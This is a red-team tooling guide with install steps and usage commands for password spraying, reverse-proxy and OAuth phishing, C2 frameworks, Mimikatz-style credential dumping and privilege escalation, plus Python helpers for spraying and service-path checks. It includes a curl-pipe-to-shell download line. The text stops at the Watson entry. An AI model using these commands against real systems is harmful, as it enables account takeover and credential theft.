
RED TEAM TOOLS BY GOVERDHAN KUMAR


Red Team Arsenal: A Comprehensive Compilation of Tools for Offensive Security Operations

GOVERDHAN KUMAR

INTRODUCTION

Navigating the dynamic landscape of cybersecurity requires a comprehensive arsenal of tools for offensive security operations. This curated collection provides a diverse range of tools, categorized by their roles, to give red teamers the capabilities needed to assess, simulate, and strengthen organizational defenses. From reconnaissance to defense evasion, this compilation equips security professionals with the means to responsibly uncover vulnerabilities, reinforce cybersecurity, and contribute to a safer digital environment.

Catalog

RECONNAISSANCE
1. RustScan
2. NmapAutomator
3. AutoRecon
4. Amass
5. CloudEnum
6. Recon-NG
7. AttackSurfaceMapper
8. DNSDumpster

INITIAL ACCESS
1. SprayingToolKit
2. o365Recon
3. Psudohash
4. CredMaster
5. DomainPasswordSpray
6. TheSprayer
7. TREVORspray

DELIVERY
1. o365AttackToolKit
2. EvilGinx2
3. GoPhish
4. PwnAuth
5. Modlishka

COMMAND AND CONTROL
1. PoshC2
2. Sliver
3. SILENTTRINITY
4. Empire
5. AzureC2Relay
6. Havoc C2
7. Mythic C2

CREDENTIAL DUMPING
1. MimiKatz
2. HekaTomb
3. SharpLAPS
4. Net-GPPPassword
5. PyPyKatz

PRIVILEGE ESCALATION
1. SharpUp
2. MultiPotato
3. PEASS - Privilege Escalation Awesome Scripts SUITE
4. Watson
5. Bat-Potato

DEFENSE EVASION
1. Villain
2. EDRSandBlast
3. SPAWN - Cobalt Strike BOF
4. NetLoader
5. KillDefenderBOF

CONCLUSION

RECONNAISSANCE

1. RustScan:

• Description: RustScan is a fast port scanner written in Rust. It finds open ports quickly and can hand them straight to Nmap for service detection, so the slow part of a scan only runs against ports that are actually open.
• Installation: Build from source with Cargo (Rust's package manager), or install the published crate with `cargo install rustscan`:

git clone https://github.com/RustScan/RustScan.git
cd RustScan
cargo build --release

• Usage: After building, run `./target/release/rustscan -a <target IP or hostname>`. Anything after `--` is passed to Nmap, e.g. `rustscan -a 10.0.0.5 -- -sV -sC`. The default batch size is aggressive; lower it with `-b` on fragile networks or when the target sits behind rate limiting.

2. NmapAutomator:

• Description: nmapAutomator is a Bash wrapper that runs Nmap in stages (quick port sweep, full TCP, script and version scan, UDP, vulnerability scripts) and saves each stage's output into a per-host directory, so you can start reading results while later stages are still running. It reports what Nmap's scripts report; it has no vulnerability checks of its own.
• Installation: Clone the GitHub repository and make the script executable:
https://github.com/21y4d/nmapAutomator
• Usage: Point the script at a host and pick a scan type; it creates the output directory itself:

./nmapAutomator.sh -H 10.0.0.5 -t All

Scan types include Network, Port, Script, Full, UDP, Vulns, Recon and All. The UDP and Vulns stages need root.

3. AutoRecon:

• Description: AutoRecon is a multi-threaded reconnaissance tool that port-scans a target and then launches per-service enumeration (web, SMB, LDAP, SNMP and so on) based on what it finds, writing everything under a results directory per target.
• Installation: Install with pipx (or pip) straight from GitHub: `pipx install git+https://github.com/Tib3rius/AutoRecon.git`. Most enumeration plugins call external tools (nmap, gobuster or feroxbuster, enum4linux, nikto, ...), which must be on PATH.
• Usage: Run `autorecon <target IP or hostname>`; results land in `results/<target>/`. Several plugins need root for raw-socket scans, so run it with `sudo`, or check the manual commands it writes out for anything it could not run.

4. Amass:

• Description: Amass (an OWASP project) performs DNS enumeration and attack-surface mapping: passive sources, active brute forcing, and a local graph database of everything it has found.
• Installation: Download a release binary or build from the GitHub repository: https://github.com/OWASP/Amass
• Usage: `amass enum -d target.com` enumerates subdomains; add `-passive` to avoid touching the target's resolvers at all. `amass intel -d target.com` collects related domains and ASN information from open sources.


5. CloudEnum:

• Description: cloud_enum takes a keyword (company name, product, project) and searches the public namespaces of AWS (S3 buckets), Azure (storage accounts, web apps) and Google Cloud (buckets, Firebase, App Engine) for resources whose names contain mutations of it, flagging any that are open.
• Installation: Clone from the GitHub repository and install its Python requirements: https://github.com/initstring/cloud_enum
• Usage: Run `python3 cloud_enum.py -k targetcorp` to search all three providers; the keyword is mutated with a built-in list (`-dev`, `-prod`, `-backup` and similar). Disable providers you do not care about with `--disable-aws`, `--disable-azure` or `--disable-gcp`.

6. Recon-NG:

• Description: Recon-ng is a modular reconnaissance framework with a Metasploit-style console; its modules pull data from open sources (certificate transparency, DNS, search engines, breach data) into a local database you can report from.
• Installation: Pre-installed on Kali Linux. For other systems, follow the guide in the GitHub repository:
https://github.com/lanmaster53/recon-ng
• Usage: Launch `recon-ng`, install modules from the marketplace, then load and run them:

marketplace install recon/domains-hosts/hackertarget
modules load recon/domains-hosts/hackertarget
options set SOURCE target.com
run

Most data-source modules need an API key, set with `keys add <name> <value>`.

7. AttackSurfaceMapper:

• Description: AttackSurfaceMapper takes a list of domains, subdomains or IP ranges and expands it into an organisation's external attack surface (subdomains, resolved hosts, open ports, related records), mostly from passive sources.
• Installation: Clone from the GitHub repository and install its Python requirements:
https://github.com/superhedgy/AttackSurfaceMapper
• Usage: Run `python3 ASM.py -t target.com -ln -w resources/top100_sublist.txt -o target_asm`, where `-t` is the target (or a file of targets), `-ln` enables LinkedIn name scraping and `-w` is the subdomain wordlist used for brute forcing.

8. DNSDumpster:

• Description: DNSDumpster is a free online service that returns DNS records, MX/NS hosts and subdomains for a domain from passive data, so nothing touches the target.
• Usage: Visit https://dnsdumpster.com/, enter the target domain, and analyze the results.

INITIAL ACCESS

1. SprayingToolKit:

• Description: SprayingToolkit is a set of Python scripts for password spraying against OWA, Lync/Skype for Business and IMAP (`atomizer.py`), plus helpers for harvesting names from LinkedIn and building username lists (`spindrift.py`, `aerosol.py`).
• Installation: Clone from the GitHub repository and install the requirements: https://github.com/byt3bl33d3r/SprayingToolkit
• Usage: Spray one password across a list of users against an OWA endpoint:

python3 atomizer.py owa mail.target.com 'Spring2024!' users.txt

Before any spray, read the target's lockout policy (threshold and observation window) and keep attempts per account below the threshold inside that window, or you will lock out the user base instead of testing it.

2. o365Recon:

• Description: o365recon is a PowerShell script that, given valid credentials, pulls an inventory of a Microsoft 365 / Azure AD tenant (users, groups, roles, devices, licences, conditional access policies) to find misconfigurations and privileged accounts.
• Installation: Clone from the GitHub repository; it relies on the AzureAD and MSOnline PowerShell modules: https://github.com/gremwell/o365recon
• Usage: From a PowerShell session with those modules installed, run `.\o365recon.ps1 -azure -all` and authenticate when prompted; output is written to text files per category.

3. Psudohash:

• Description: psudohash builds a targeted password wordlist from a few keywords (company name, product, city) by applying the mutations people actually use: case changes, leetspeak substitutions, year suffixes and common padding such as `!` or `123`. It is meant for spraying and cracking, not hashing, despite the name.
• Installation: Clone from the GitHub repository: https://github.com/t3l3machus/psudohash
• Usage: Run `python3 psudohash.py -w acme,acmecorp -cpa -y 2020-2024` to mutate both keywords, append common paddings (`-cpa`) and append the given year range (`-y`). Write the result to a file with `-o` and feed it straight to a spraying tool.
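The mutation idea behind psudohash is small enough to show in full. The following is an added example written for this page, not psudohash's code: it applies case, leetspeak, year and padding mutations to a keyword and then does something a sprayer should always do first, which is drop candidates that cannot pass the target's password complexity policy, since each of those still costs an attempt against the lockout budget. The keyword, years and policy values are constructed for the example.

```python
"""Keyword-based password candidate generation with a policy filter (added example).

Not psudohash's code; the mutation rules here are a simplified version of the
same idea. Keywords, years and the policy thresholds are constructed inputs.
"""

LEET = {"a": "4", "e": "3", "i": "1", "o": "0", "s": "5"}
COMMON_PADDING = ("!", "123", "!@#")


def case_variants(word):
    """lower / Capitalised / UPPER: the three forms people actually type."""
    return {word.lower(), word.capitalize(), word.upper()}


def leet(word):
    """Full substitution only; partial substitutions explode the list for little gain."""
    return "".join(LEET.get(c.lower(), c) for c in word)


def mutate(keywords, years=(), paddings=COMMON_PADDING):
    """Return a sorted, de-duplicated candidate list for the given keywords."""
    out = set()
    for kw in keywords:
        bases = set()
        for v in case_variants(kw):
            bases.update({v, leet(v)})
        for b in bases:
            out.add(b)
            for y in years:
                out.update({f"{b}{y}", f"{b}{str(y)[-2:]}"})   # Acme2024 and Acme24
            for p in paddings:
                out.add(f"{b}{p}")
                for y in years:
                    out.add(f"{b}{y}{p}")                        # Acme2024!
    return sorted(out)


def meets_policy(pw, min_len=8, min_classes=3):
    """Windows-style complexity: minimum length plus N of {lower, upper, digit, symbol}."""
    classes = sum((
        any(c.islower() for c in pw),
        any(c.isupper() for c in pw),
        any(c.isdigit() for c in pw),
        any(not c.isalnum() for c in pw),
    ))
    return len(pw) >= min_len and classes >= min_classes


def spray_list(keywords, years=(), min_len=8, min_classes=3):
    """Only the candidates worth spending a lockout-budget attempt on."""
    return [c for c in mutate(keywords, years) if meets_policy(c, min_len, min_classes)]


if __name__ == "__main__":
    for c in spray_list(["acme"], years=[2024]):
        print(c)
```

On a real engagement the policy values come from `net accounts` or `Get-ADDefaultDomainPasswordPolicy`; if the domain enforces length 12, every 8-character candidate in the list is a wasted attempt.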

4. CredMaster:

• Description: CredMaster is a password spraying tool that routes each request through AWS API Gateway (FireProx), so every attempt arrives from a different source IP and per-IP throttling or blocking on the target does not stop the spray. Plugins cover Office 365, OWA, Okta, ADFS, Fortinet and other login portals.
• Installation: Clone from the GitHub repository and install the requirements; it needs an AWS access key allowed to create API Gateway endpoints: https://github.com/knavesec/CredMaster
• Usage: Pick a plugin and supply users, passwords and AWS keys:

python3 credmaster.py --plugin o365 -u users.txt -p passwords.txt --access_key <AWS key> --secret_access_key <AWS secret>

Remove the API Gateway endpoints when the engagement ends (the tool has a `--clean` option) so they are not left billing the account or usable by someone else.

5. DomainPasswordSpray:

• Description: DomainPasswordSpray is a PowerShell script that sprays one password against every enabled account in the current Active Directory domain, over LDAP, from a domain-joined host. It reads the domain lockout policy first and warns (asking for confirmation) when the spray would cross the threshold inside the observation window, which is the main reason to prefer it over ad-hoc loops.
• Installation: Download the script from the GitHub repository:
https://github.com/dafthack/DomainPasswordSpray
• Usage: Import the module and spray a single password, writing hits to a file:

Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password 'Spring2024!' -OutFile sprayed.txt

`Get-DomainUserList` exports the user list it would use, and `-UserList users.txt` lets you supply your own.

6. TheSprayer:

• Description: TheSprayer is a Python tool for spraying Active Directory accounts over LDAP from a host that need not be domain-joined. It pulls the domain password policy and each user's bad-password count first and schedules attempts so that no account reaches the lockout threshold.
• Installation: Clone from the GitHub repository and install the requirements: https://github.com/coj337/TheSprayer
• Usage: Supply the domain, a domain controller, a user list and a password list, e.g. `python3 TheSprayer.py -d target.local -dc 10.0.0.10 -u users.txt -p passwords.txt` (check `--help`; flag names have changed between versions). Give it a low-privileged domain credential if you want it to read the lockout policy and per-user counters rather than guessing.

7. TREVORspray:

• Description: TREVORspray is a Python password sprayer built for Microsoft 365 / Azure AD (with modules for other targets). It interprets the Azure AD error codes that distinguish a wrong password from a valid one blocked by MFA, a locked account or a non-existent user, and can spread the source IP across SSH hosts or cloud proxies.
• Installation: Install from PyPI with `pip install trevorspray`, or clone from the GitHub repository:
https://github.com/blacklanternsecurity/TREVORspray
• Usage: Spray one password across a list of e-mail addresses:

trevorspray -u users.txt -p 'Spring2024!'

Add `--ssh user@host1 user@host2` to round-robin attempts through SSH SOCKS proxies. Read the reported error codes rather than just success or failure: a valid password that stops at MFA is still a finding.
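Every tool in this section (SprayingToolkit, DomainPasswordSpray, TheSprayer, TREVORspray) has to respect the same constraint: stay under the domain's lockout threshold inside its observation window, per account, while still working through the password list. The following is an added example written for this page, not code from any of those projects. It isolates that scheduling rule: the network is replaced by an injected `attempt(user, password)` callback and the wall clock by an injectable clock so the run is instant, and the users, passwords, policy and the one "valid" credential are constructed test data.

```python
"""Lockout-aware password spray scheduler (added example).

Not code from SprayingToolkit, DomainPasswordSpray, TheSprayer or TREVORspray.
The authentication call and the clock are injected; everything below the classes
is a constructed scenario.
"""
from collections import defaultdict


class FakeClock:
    """Minute counter standing in for time.time()/time.sleep(), so a run is instant."""

    def __init__(self):
        self.t = 0

    def now(self):
        return self.t

    def sleep(self, minutes):
        self.t += minutes


class SpraySchedule:
    def __init__(self, threshold, window, attempt, clock, margin=1):
        # threshold: lockoutThreshold from `net accounts`; 0 means no lockout policy
        # window:    lockoutObservationWindow in minutes
        # margin:    failures left in reserve for the user's own typos
        if threshold and threshold - margin < 1:
            raise ValueError("lockout threshold too low to spray without locking accounts")
        self.threshold, self.window, self.margin = threshold, window, margin
        self.attempt, self.clock = attempt, clock
        self.failures = defaultdict(list)   # user -> minute of each failed attempt
        self.found = {}                     # user -> valid password
        self.log = []                       # (minute, user, password, ok) audit trail

    def counted_failures(self, user):
        """Failures still inside the observation window; older ones no longer count."""
        now = self.clock.now()
        self.failures[user] = [t for t in self.failures[user] if now - t < self.window]
        return self.failures[user]

    def wait_for_budget(self, user):
        """Sleep until the oldest counted failure ages out, plus a minute of slack."""
        if not self.threshold:
            return
        while len(self.counted_failures(user)) >= self.threshold - self.margin:
            oldest = min(self.failures[user])
            self.clock.sleep(oldest + self.window - self.clock.now() + 1)

    def spray(self, users, passwords):
        """One password across all users, then the next: spreads load across accounts."""
        for pw in passwords:
            for user in users:
                if user in self.found:
                    continue                # do not burn budget on a known-good account
                self.wait_for_budget(user)
                now = self.clock.now()
                ok = self.attempt(user, pw)
                self.log.append((now, user, pw, ok))
                if ok:
                    self.found[user] = pw
                else:
                    self.failures[user].append(now)
        return dict(self.found)


def max_failures_in_window(log, window):
    """Worst per-user failure count in any sliding window; must stay below threshold."""
    per_user = defaultdict(list)
    for t, user, _, ok in log:
        if not ok:
            per_user[user].append(t)
    worst = 0
    for times in per_user.values():
        times.sort()
        for start in times:
            worst = max(worst, sum(1 for t in times if start <= t < start + window))
    return worst


# Constructed scenario: three accounts, one of which uses a seasonal password.
VALID = {"bob": "Autumn2024!"}


def demo():
    clock = FakeClock()
    sched = SpraySchedule(threshold=3, window=30,
                          attempt=lambda u, p: VALID.get(u) == p, clock=clock)
    found = sched.spray(["alice", "bob", "carol"],
                        ["Spring2024!", "Summer2024!", "Autumn2024!", "Winter2024!"])
    return found, sched.log, clock.now()


if __name__ == "__main__":
    found, log, minutes = demo()
    print(found, f"{len(log)} attempts over {minutes} min, "
          f"worst window {max_failures_in_window(log, 30)}")
```

With threshold 3 and a 30-minute window the scheduler allows two failures per account, then waits for the window to expire before the third password; the audit log is what you hand over if an account does get locked and the blue team asks what happened. Against a real target the `attempt` callback should also recognise "account locked" responses and pull that user out of the rotation rather than keep counting.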

DELIVERY

1. o365AttackToolKit:

• Description: o365-attack-toolkit (MDSec) is an OAuth-based phishing toolkit for Office 365, written in Go. The victim is sent to a consent page for an attacker-registered Azure application; once they consent, the toolkit holds an access token and can read mail, create Outlook rules and pull files from OneDrive/SharePoint without ever seeing a password.
• Installation: Clone from the GitHub repository and build with `go build`: https://github.com/mdsecactivebreach/o365-attack-toolkit
• Usage:
  - Register an Azure application with the Graph permissions you need, and put its client ID, secret and redirect URL into the toolkit's configuration file (template.toml).
  - Start the toolkit; it exposes a phishing endpoint (the consent link you send) and a management interface for working with the captured tokens.
  - Because the foothold is a token rather than a password, a password reset does not end it; the application consent has to be revoked. That is also the detection angle for defenders: audit new app consents in the tenant.

2. EvilGinx2:

• Description: Evilginx2 is a man-in-the-middle phishing framework written in Go. It reverse-proxies the real login site through an attacker-controlled domain, so the victim completes a genuine login (including MFA) while evilginx records the credentials and the resulting session cookies. The cookies are what make it dangerous: they allow login without the password or the second factor.
• Installation: Download a release or build from the GitHub repository: https://github.com/kgretzky/evilginx2
• Usage:
  - Start it with a phishlet directory: `./evilginx2 -p ./phishlets`
  - In its console, point `config` at your domain and external IP, then enable a phishlet and create a lure:

config domain phish.example
phishlets hostname o365 phish.example
phishlets enable o365
lures create o365
lures get-url 0

  - Send the lure URL; captured sessions appear under `sessions`, and `sessions <id>` shows the cookies to import into a browser.

3. GoPhish:

• Description: GoPhish is an open-source phishing framework for running awareness campaigns: e-mail templates, landing pages, sending profiles, scheduled sends and per-recipient tracking of opens, clicks and submitted data.
• Installation: Download a release binary or build from the GitHub repository: https://github.com/gophish/gophish
• Usage:
  - Start the server with `./gophish`; the admin interface listens on https://127.0.0.1:3333 by default and the initial admin password is printed in the log on first start.
  - Create a sending profile (SMTP), an e-mail template, a landing page and a group of targets, then a campaign that ties them together.
  - Launch the campaign and watch results on the dashboard. Keep the admin interface bound to localhost (the default in config.json) or behind SSH; it is not meant to be internet-facing.


4. PwnAuth:

• Description: PwnAuth (FireEye/Mandiant) is a framework for OAuth abuse: it hosts a malicious OAuth application (the shipped module targets Office 365), sends victims a consent link, and stores the access and refresh tokens of anyone who consents. With a token it can read mail, search messages and download attachments through the Graph API. No password is captured, so a password reset does not revoke the access.
• Installation: Clone from the GitHub repository; it ships with a docker-compose setup: https://github.com/fireeye/PwnAuth
• Usage:
  - Register an application in Azure AD and enter its client ID, secret and redirect URI in the PwnAuth module settings.
  - Bring the containers up, generate the consent URL from the web interface and deliver it to targets.
  - Work with victims' mailboxes from the interface once tokens arrive. Revoking the application consent is what ends the access, which is the same check defenders should run.

5. Modlishka:

• Description: Modlishka is a reverse-proxy phishing tool written in Go. Instead of cloned pages it proxies the real site through your domain, rewriting links on the fly, so the victim sees the genuine login flow while credentials and session cookies pass through the proxy; it handles 2FA flows in real time.
• Installation: Download a release or build from the GitHub repository: https://github.com/drk1wi/Modlishka
• Usage:
  - Write a JSON configuration with the proxied target, your phishing domain and TLS certificate (the repository's templates/ directory has examples).
  - Start the proxy with it:

sudo ./proxy -config templates/target.json

  - Credentials and sessions are collected in its control panel; `-debug` helps while a new target is being tuned.

COMMAND AND CONTROL

1. PoshC2:

• Description: PoshC2 (Nettitude) is a proxy-aware C2 framework with PowerShell, C#, Python and native implants, a Python team server and a console-style operator client; it ships with a large library of post-exploitation modules.
• Installation: Install with the script in the GitHub repository (it sets up a Python virtualenv and the `posh-*` helper commands):
https://github.com/nettitude/PoshC2
• Usage:
  - Create a project and edit its configuration (listener host, ports, payload options): `posh-project -n engagement1`, then `posh-config`.
  - Start the team server with `posh-server` and the operator console with `posh`; payloads are written to the project's payloads directory on first start.
  - From the console, select an implant and run its modules; `posh-log` tails the server log.

2. Sliver:

• Description: Sliver (Bishop Fox) is a cross-platform C2 framework written in Go. Implants for Windows, Linux and macOS call back over mutual TLS, WireGuard, HTTP(S) or DNS, and several operators share one server through mTLS-authenticated clients.
• Installation: Download a release binary from the GitHub repository: https://github.com/BishopFox/sliver
• Usage:
  - Start the server, which opens the operator console directly: `./sliver-server`
  - Generate an implant and start the matching listener:

generate --mtls <server IP> --os windows --save /tmp
mtls

  - When an implant calls back, `sessions` lists it and `use <id>` drops you into it. For multiple operators, create a config with `new-operator` on the server and load it with `sliver import` on the client.

3. SILENTTRINITY:

• Description: SILENTTRINITY is a post-exploitation framework whose implant compiles and runs Boo-language modules inside the .NET runtime, avoiding PowerShell and tooling on disk. A team server hosts the sessions; operator clients connect to it over WebSockets.
• Installation: Clone from the GitHub repository and install the requirements: https://github.com/byt3bl33d3r/SILENTTRINITY
• Usage:
  - Start a team server bound to an interface with a shared password: `python3 st.py teamserver 0.0.0.0 '<password>'`
  - Connect a client: `python3 st.py client wss://<operator>:<password>@<server IP>:5000`
  - In the client, start a listener (`listeners`, `use http`, `start`), generate a stager (`stagers`, `use powershell`, `generate <listener>`) and run modules against the sessions that check in.

4. Empire:

• Description: Empire (maintained by BC-SECURITY) is a post-exploitation framework with PowerShell, Python, C# and IronPython agents, a REST API, and hundreds of modules for situational awareness, credential access, lateral movement and persistence.
• Installation: Clone from the GitHub repository and run its setup script: https://github.com/BC-SECURITY/Empire
• Usage:
  - Start the server: `./ps-empire server`
  - Start the CLI client in another terminal: `./ps-empire client`. Starkiller, the web interface, is served by the same server (default http://localhost:1337 in Empire 5).
  - Example: stand up an HTTP listener, generate a stager, then run a command on the agent that checks in:

uselistener http
execute
usestager windows/launcher_bat
set Listener http
execute
agents
interact <agent name>
shell whoami /all

5. AzureC2Relay:

• Description: AzureC2Relay is an Azure Function that sits in front of a Cobalt Strike team server. It validates every incoming request against the Malleable C2 profile and forwards only requests that look like genuine beacon traffic; everything else (scanners, sandboxes, analysts following the URL) gets a decoy response, and the team server is never exposed directly.
• Installation:
  - Clone from the GitHub repository: https://github.com/FSecureLABS/AzureC2Relay
  - It deploys with Terraform: put your Malleable C2 profile in place, fill in the variables file (team server address, function name, region), log in with `az login`, then run `terraform init` and `terraform apply`.
• Usage:
  - Point the beacon's C2 host at the Function App's hostname and use the same profile on the team server.
  - Because only profile-conformant traffic is relayed, any change to the profile has to be redeployed to the relay as well.

6. Havoc C2:

• Description: Havoc is an open-source C2 framework with a team server written in Go, a Qt client, and the Demon agent for Windows (sleep obfuscation, indirect syscalls, BOF support). It is a common substitute for Cobalt Strike in red team labs.
• Installation: Clone from the GitHub repository and follow its build instructions for the team server and client: https://github.com/HavocFramework/Havoc
• Usage:
  - Start the team server with a profile (listeners, operator accounts and sleep settings are all defined there):

./havoc server --profile ./profiles/havoc.yaotl -v

  - Start the client with `./havoc client`, log in as one of the operators from the profile, create a listener, and generate a Demon payload from the Payload menu.

7. Mythic C2:

• Description: Mythic is a multi-agent, multi-operator C2 platform built around Docker: each agent type and each C2 profile is its own container installed from a separate repository, and a web UI ties them together with a full REST/GraphQL API.
• Installation: Clone from the GitHub repository and build the CLI with `sudo make`: https://github.com/its-a-feature/Mythic
• Usage:
  - Install an agent and a C2 profile, then start the stack:

sudo ./mythic-cli install github https://github.com/MythicAgents/apollo
sudo ./mythic-cli install github https://github.com/MythicC2Profiles/http
sudo ./mythic-cli start

  - Log in to the web interface on https://127.0.0.1:7443 (the admin password is in the generated `.env` file), create an HTTP C2 profile instance and build an Apollo payload from the Payloads page.

CREDENTIAL DUMPING

1. MimiKatz:

• Description: Mimikatz reads credential material from Windows: plaintext passwords, NTLM hashes and Kerberos tickets held by LSASS, cached domain logons and LSA secrets from the registry, and DPAPI keys. It is also the reference implementation for pass-the-hash, pass-the-ticket, golden/silver tickets and DCSync.
• Installation: Download a signed release binary from the GitHub repository, or build `mimikatz.sln` with Visual Studio: https://github.com/gentilkiwi/mimikatz
• Usage:
  - Reading LSASS requires local administrator rights and SeDebugPrivilege:

privilege::debug
sekurlsa::logonpasswords

  - To avoid running it on the host at all, take a memory dump of LSASS another way (Task Manager, procdump, comsvcs.dll) and load the dump offline:

sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

Expect LSA Protection (RunAsPPL) and Credential Guard to block or empty these results on hardened hosts, and expect any EDR to flag the binary and its command-line strings on sight.

2. HekaTomb:

• Description: HEKATOMB is a Python tool that, given domain administrator credentials, lists every computer and user over LDAP, retrieves the DPAPI domain backup key from a domain controller, then pulls each user's DPAPI master keys and credential blobs from every reachable host and decrypts them. The result is the saved credentials (browsers, RDP, Windows Credential Manager) of the whole domain, without touching LSASS.
• Installation: Install from PyPI with `pip install hekatomb`, or clone from the GitHub repository: https://github.com/Processus-Thief/HEKATOMB
• Usage: Supply domain admin credentials (password or NTLM hash, impacket-style) and a domain controller:

hekatomb -hashes :<NTLM hash> target.local/administrator@10.0.0.10 -debug

It is noisy: it touches SMB on every host and reads the backup key over LSARPC, both of which show up in domain controller and endpoint logs.

3. SharpLAPS:

• Description: SharpLAPS is a C# tool that queries Active Directory over LDAP for the `ms-Mcs-AdmPwd` attribute, i.e. the local administrator passwords managed by legacy LAPS (Windows LAPS uses `msLAPS-Password` instead), for every computer the current or supplied account is allowed to read. Over-broad read rights on that attribute are the misconfiguration it hunts for.
• Installation: Download from the GitHub repository and build the solution with Visual Studio or msbuild: https://github.com/swisskyrepo/SharpLAPS
• Usage: Point it at a domain controller, with explicit credentials if you are not already running as the account to test:

SharpLAPS.exe /host:10.0.0.10 /user:target.local\jdoe /pass:<password>

Every successful read is an administrator password for a workstation, so store the output accordingly. The read is an LDAP query a SIEM can alert on when it comes from an unexpected principal.

4. Net-GPPPassword:

• Description: Net-GPPPassword is a .NET port of PowerSploit's Get-GPPPassword. It searches the domain's SYSVOL share for Group Policy Preference files (Groups.xml, Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml, Printers.xml) and decrypts any `cpassword` values with the AES key Microsoft published, recovering plaintext passwords that were set through GPP (MS14-025).
• Installation: Download from the GitHub repository and build with Visual Studio, or run it through a .NET assembly loader: https://github.com/outflanknl/Net-GPPPassword
• Usage: Run `Net-GPPPassword.exe` from any domain-joined context; no privileges beyond domain user are needed because SYSVOL is readable by every domain member. The PowerShell original is still useful where PowerShell is allowed:

powershell.exe -ExecutionPolicy Bypass -Command "Import-Module .\Get-GPPPassword.ps1; Get-GPPPassword"

MS14-025 stopped the creation of new GPP passwords but did not remove existing ones, so old files in SYSVOL remain a finding.

5. PyPyKatz:

• Description: pypykatz is a pure-Python implementation of Mimikatz's parsing logic. It reads LSASS minidumps (and live LSASS on Windows) and extracts logon passwords, NTLM hashes, Kerberos tickets and DPAPI keys, and it parses exported registry hives for SAM hashes and LSA secrets, so the analysis can happen on a Linux box rather than on the target.
• Installation: `pip install pypykatz` (the GitHub repository is https://github.com/skelsec/pypykatz).
• Usage:
  - Parse a minidump taken from LSASS:

pypykatz lsa minidump lsass.dmp

  - Parse exported registry hives for local hashes and LSA secrets:

pypykatz registry --sam sam.hive --security security.hive system.hive

The tool prints every credential it finds, so handle its output with the same care as the dump itself.


PRIVILEGE ESCALATION

1. SharpUp:

• Description: SharpUp (GhostPack) is a C# port of PowerUp's privilege escalation checks: modifiable service binaries and registry keys, unquoted service paths, writable directories in %PATH%, AlwaysInstallElevated, cached GPP passwords, hijackable DLL locations and more. It reports candidates; it does not exploit them.
• Installation: Clone from the GitHub repository and build the solution with Visual Studio, or use a prebuilt binary from SharpCollection: https://github.com/GhostPack/SharpUp
• Usage:
  - Run every check: `SharpUp.exe audit`
  - Run a single check by name, e.g. `SharpUp.exe UnquotedServicePath`
  - Each hit still has to be confirmed by hand (can you actually write to the path, does the service restart, which account does it run as) before it is a finding.
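The unquoted service path check is a good illustration of what SharpUp (and winPEAS, below) actually evaluate, and of why a hit still needs confirmation. The following is an added example written for this page, not code from SharpUp or winPEAS: it re-implements that one check in pure Python so the logic can be read and exercised offline. The service table and the set of writable directories are constructed; on a real host they come from `sc qc <service>` or the ImagePath registry values and from ACL checks.

```python
"""Unquoted service path check (added example).

Not code from SharpUp or winPEAS. SAMPLE_SERVICES and WRITABLE are constructed
stand-ins for `sc qc` output and for the result of an ACL check on the host.
"""


def hijack_candidates(image_path):
    """Paths Windows tries before the real binary when a service path is unquoted.

    CreateProcess parses an unquoted path left to right at each space, so
    'C:\\Program Files\\My App\\svc.exe' is tried as 'C:\\Program.exe', then
    'C:\\Program Files\\My.exe', and only then as the intended executable.
    """
    path = image_path.strip()
    if path.startswith('"'):
        return []                                   # quoted: no ambiguity
    exe_end = path.lower().find(".exe")
    if exe_end == -1:
        return []                                   # not a plain .exe image path
    path = path[: exe_end + 4]                      # drop service arguments after the .exe
    parts = path.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def exploitable(services, writable_dirs):
    """(service, path) pairs where a low-privileged user could plant the candidate."""
    writable = {d.rstrip("\\").lower() for d in writable_dirs}
    hits = []
    for name, image in services.items():
        for cand in hijack_candidates(image):
            directory = cand.rsplit("\\", 1)[0]
            if directory.rstrip("\\").lower() in writable:
                hits.append((name, cand))
    return hits


# Constructed service table, in the form `sc qc` reports BINARY_PATH_NAME.
SAMPLE_SERVICES = {
    "BackupAgent": r"C:\Tools\Backup Agent\agent.exe",
    "VendorSvc": r'"C:\Program Files\Vendor\svc.exe" -config "a b"',
    "wuauserv": r"C:\Windows\System32\svchost.exe -k netsvcs",
    "Updater": r"C:\Program Files\Acme Updater\upd.exe /silent",
}
# Constructed: directories the current user can write to (icacls / Get-Acl on a real host).
WRITABLE = {r"C:\Tools", r"C:\Users\Public"}

if __name__ == "__main__":
    for name, image in SAMPLE_SERVICES.items():
        print(name, hijack_candidates(image))
    print("exploitable:", exploitable(SAMPLE_SERVICES, WRITABLE))
```

In the sample only `BackupAgent` is exploitable: `Updater` is unquoted too, but its candidates land in `C:\` and `C:\Program Files`, where standard users cannot create files. A writable candidate location is still only half the story; the service must also run as a privileged account and be restartable (or the host rebootable) by you.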

2. MultiPotato:

• Description: MultiPotato is a C++ tool for the "Potato" family of local privilege escalation: from a context that holds SeImpersonatePrivilege (IIS, MSSQL, most service accounts) it coerces SYSTEM into authenticating to a named pipe it controls, impersonates the resulting token and runs a payload as SYSTEM. Several trigger and execution methods are combined in one binary.
• Installation: Download from the GitHub repository and build with Visual Studio: https://github.com/S3cur3Th1sSh1t/MultiPotato
• Usage: Choose an execution technique and the payload to run:

MultiPotato.exe -t CreateProcessAsUserW -p C:\Users\Public\payload.exe

Check `whoami /priv` first: without SeImpersonatePrivilege (or SeAssignPrimaryTokenPrivilege) none of the Potato variants apply.

3. PEASS - Privilege Escalation Awesome Scripts SUITE:

• Description: PEASS-ng is the Privilege Escalation Awesome Scripts suite: winPEAS (a C# executable, with a .bat fallback) for Windows and linPEAS (a shell script) for Linux and macOS. Each runs a large battery of local enumeration checks (services, permissions, credentials in files, OS and kernel version, scheduled tasks, capabilities, sudo rules) and colour-codes the results by how likely they are to yield privileges.
• Installation: Download the release binaries and scripts from the GitHub repository (the old "privilege-escalation-awesome-scripts-suite" name redirects here):
https://github.com/carlospolop/PEASS-ng
• Usage:
  - Linux, downloaded and run in one go:

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

  - Windows: copy winPEASany.exe to the host and run `winPEASany.exe`, or `winPEASany.exe servicesinfo` to limit it to one group of checks. Both produce a lot of output; redirect it to a file and read the red and yellow highlights first.

4. Watson:

